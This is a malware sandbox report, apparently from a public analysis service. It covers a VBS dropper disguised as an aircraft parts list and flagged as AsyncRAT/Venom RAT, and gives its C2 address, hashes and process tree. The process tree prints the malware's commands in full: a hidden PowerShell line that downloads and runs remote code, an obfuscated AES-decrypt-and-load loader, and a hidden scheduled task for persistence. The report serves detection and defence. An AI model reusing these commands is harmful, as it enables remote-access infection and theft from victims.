Overview

overview

10

Static

static

1

Needed Air...ls.vbs

windows7-x64

8

Needed Air...ls.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-12-2024 14:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Needed Aircraft PN#_Desc_&_Qty Details.vbs

  • Size

    91KB

  • MD5

    7f67c01cf304afa0adf4c3095477ab07

  • SHA1

    9c5e5e550e15b4e0e949591488ba72154e13378f

  • SHA256

    051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320

  • SHA512

    cbcf82588439f81719c5931b08176de77e3c7d08e22c084836ee3224dbbc6a96ebb4873cb2ac1d6d0225b6f7a8f8cef873fab3b54115e4cd8eb0ec1b623a7737

  • SSDEEP

    1536:M8we4uQyXKFD5cFkWLcaxdYOyhGhRW9w+vcdlziIqzRNBHarEZ+2K:M8z4DOOW4eOFGhRW9wCIzi/8rE42K

Score
10/10
asyncratcore i9 omenexecutionrat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

core i9 OMEN

C2

45.88.88.7:4164

Mutex

nxafgjygny

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 16 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Needed Aircraft PN#_Desc_&_Qty Details.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2420
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1188
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:940
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('emte3ttqtxU8Z7uNtvShj79DDsvggmbvOto5AmNpef0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UMzwlReo+QuIcZAVBvu6GA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vpydZ=New-Object System.IO.MemoryStream(,$param_var); $whvQX=New-Object System.IO.MemoryStream; $NaCjv=New-Object System.IO.Compression.GZipStream($vpydZ, [IO.Compression.CompressionMode]::Decompress); $NaCjv.CopyTo($whvQX); $NaCjv.Dispose(); $vpydZ.Dispose(); $whvQX.Dispose(); $whvQX.ToArray();}function execute_function($param_var,$param2_var){ $JNCLx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MwOUn=$JNCLx.EntryPoint; $MwOUn.Invoke($null, $param2_var);}$toRQS = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $toRQS;$arTVC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($toRQS).Split([Environment]::NewLine);foreach ($ixRtZ in $arTVC) { if ($ixRtZ.StartsWith(':: ')) { $rZGXb=$ixRtZ.Substring(3); break; }}$payloads_var=[string[]]$rZGXb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2640
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_327_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_327.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1280
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_327.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:8
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_327.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2348
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('emte3ttqtxU8Z7uNtvShj79DDsvggmbvOto5AmNpef0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UMzwlReo+QuIcZAVBvu6GA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vpydZ=New-Object System.IO.MemoryStream(,$param_var); $whvQX=New-Object System.IO.MemoryStream; $NaCjv=New-Object System.IO.Compression.GZipStream($vpydZ, [IO.Compression.CompressionMode]::Decompress); $NaCjv.CopyTo($whvQX); $NaCjv.Dispose(); $vpydZ.Dispose(); $whvQX.Dispose(); $whvQX.ToArray();}function execute_function($param_var,$param2_var){ $JNCLx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MwOUn=$JNCLx.EntryPoint; $MwOUn.Invoke($null, $param2_var);}$toRQS = 'C:\Users\Admin\AppData\Roaming\startup_str_327.bat';$host.UI.RawUI.WindowTitle = $toRQS;$arTVC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($toRQS).Split([Environment]::NewLine);foreach ($ixRtZ in $arTVC) { if ($ixRtZ.StartsWith(':: ')) { $rZGXb=$ixRtZ.Substring(3); break; }}$payloads_var=[string[]]$rZGXb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:1564

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    b66db53846de4860ca72a3e59b38c544

    SHA1

    2202dc88e9cddea92df4f4e8d83930efd98c9c5a

    SHA256

    b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

    SHA512

    72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    1c35d9bedd46140710d9aafb48d7b74f

    SHA1

    5e0fe67aa97e76f69e6938609c7886b5b46f4f3d

    SHA256

    742fc3924b893e460f9bd9896f688e4fbdf4af4f6af989b79fbe8831f779877b

    SHA512

    1ab09b9793133583c81069a77f217887de489c9324cc5ea59eb6d3fcee07261e207b8ff13c41a739686d1a32a5ea7808868f443fdcdd1921669c59a9b8574212

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mts4p25g.k2w.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\system.bat
    Filesize

    82KB

    MD5

    91521a30afc250ec301fbee04e3d72ec

    SHA1

    20c0d5e15643df6215f5052d70ad46d40da15fdd

    SHA256

    87f7bfaaf8f6babc9af3cb2b5de96b6365016121332bd90b8905674acd4940c4

    SHA512

    f9c61a01395eccccbb62ba2ce9cce4678da36b5a67a9712af98965c75cf126a740026bce576fe841b18ba018641842f845c007ad9e62dbde96b5cfd3b5299544

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_327.vbs
    Filesize

    115B

    MD5

    f0c5d2819f7d53ee7dcc35d09a40b1fe

    SHA1

    8480fd4270d26b2fbea189406396873f0f7a969a

    SHA256

    1067be12a8af68a29963330c6c4253b117de63caf34e6b20fb4a611ec29dbed4

    SHA512

    96e78112c0bb3b39ec3e8ae5f9c5f6af23ca05338f1de03add64e354d59015acfc74d2d61872c15f58f55decb5194b1c06cdb7ca492d524ae078e5c982cc0f82

    Download Submit

  • memory/1188-12-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1188-17-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1188-14-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1188-13-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1188-0-0x00007FFE161D3000-0x00007FFE161D5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1188-11-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1188-1-0x000001FFF4560000-0x000001FFF4582000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1564-63-0x000001312A6B0000-0x000001312A6C8000-memory.dmp

    Filesize

    96KB

    Download

  • memory/2640-33-0x00000200FE5A0000-0x00000200FE5A8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2640-34-0x00000200FF280000-0x00000200FF292000-memory.dmp

    Filesize

    72KB

    Download